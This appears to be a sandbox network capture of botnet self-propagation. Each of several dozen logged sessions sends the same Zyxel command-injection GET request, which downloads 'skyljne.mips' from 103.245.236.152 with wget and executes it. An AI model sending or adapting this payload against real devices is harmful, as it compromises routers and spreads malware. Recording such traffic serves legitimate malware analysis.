                                          Jan 14, 2024 15:46:17.010087013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4453192.168.2.2334038186.137.215.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010119915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4454192.168.2.2360984167.147.0.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010143042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4455192.168.2.235638469.246.167.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010162115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4456192.168.2.2345652108.227.93.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010195971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4457192.168.2.2356014103.233.237.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010241032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4458192.168.2.2334228156.197.106.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010267019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4459192.168.2.235711672.131.167.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010313034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4460192.168.2.234843675.156.68.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010313988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4461192.168.2.2334946133.182.126.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010354996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4462192.168.2.2341174102.230.120.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010358095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4463192.168.2.2335426142.54.118.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010404110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4464192.168.2.2339408175.159.169.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010416985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4465192.168.2.23400928.35.172.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010449886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4466192.168.2.2351110123.160.26.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010463953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4467192.168.2.235496686.154.99.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010515928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4468192.168.2.2334630154.186.148.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010546923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4469192.168.2.2333804139.209.220.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010574102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4470192.168.2.235716027.45.54.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010596991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4471192.168.2.2333254165.78.189.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010608912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4472192.168.2.235520279.7.14.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010612011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4473192.168.2.2358966186.194.31.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010648966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4474192.168.2.2355974160.135.177.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010670900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4475192.168.2.233971051.215.24.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010689974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4476192.168.2.233357283.123.64.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010724068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4477192.168.2.2355982211.42.115.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010744095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4478192.168.2.2353454168.209.31.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010766029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4479192.168.2.2341032126.236.209.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010802984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4480192.168.2.235766431.224.186.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010840893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4481192.168.2.2355016110.189.72.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010854006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4482192.168.2.2337726147.187.245.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010885954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4483192.168.2.2346596149.112.127.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010885954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4484192.168.2.234589638.131.4.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010898113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4485192.168.2.2354982141.119.113.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010973930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4486192.168.2.233879020.31.161.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.010982037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4487192.168.2.2344302213.96.105.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011001110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4488192.168.2.2354132130.239.46.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011032104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4489192.168.2.234366098.56.38.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011070013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4490192.168.2.235432875.52.84.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011101007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4491192.168.2.2358838153.170.9.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011142969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4492192.168.2.2354166161.50.31.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011153936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4493192.168.2.233905892.143.117.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011177063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4494192.168.2.235376093.140.137.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011207104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4495192.168.2.2356474116.231.236.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011210918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4496192.168.2.2340600101.48.52.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011230946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4497192.168.2.235923844.45.53.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011265993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4498192.168.2.2349862217.190.219.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011267900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4499192.168.2.2338464130.177.142.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011337996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4500192.168.2.2342896102.159.84.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011359930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4501192.168.2.2348456119.192.60.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011365891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4502192.168.2.2334358130.12.147.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011409044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4503192.168.2.2343094209.215.104.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011461020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4504192.168.2.2347822126.53.14.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011471987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4505192.168.2.2350168185.115.50.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011518002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4506192.168.2.2334372173.112.148.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011549950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4507192.168.2.2343266150.103.234.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011584044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4508192.168.2.233614878.227.197.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011605978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4509192.168.2.2342908198.234.74.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011622906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4510192.168.2.234754053.241.238.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011674881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4511192.168.2.233518452.208.186.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011697054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4512192.168.2.235165418.48.56.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011723042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4513192.168.2.236027691.167.92.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011775970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4514192.168.2.2360932176.5.75.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011795998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4515192.168.2.235836059.93.12.5443
                                          TimestampBytes transferredDirectionData
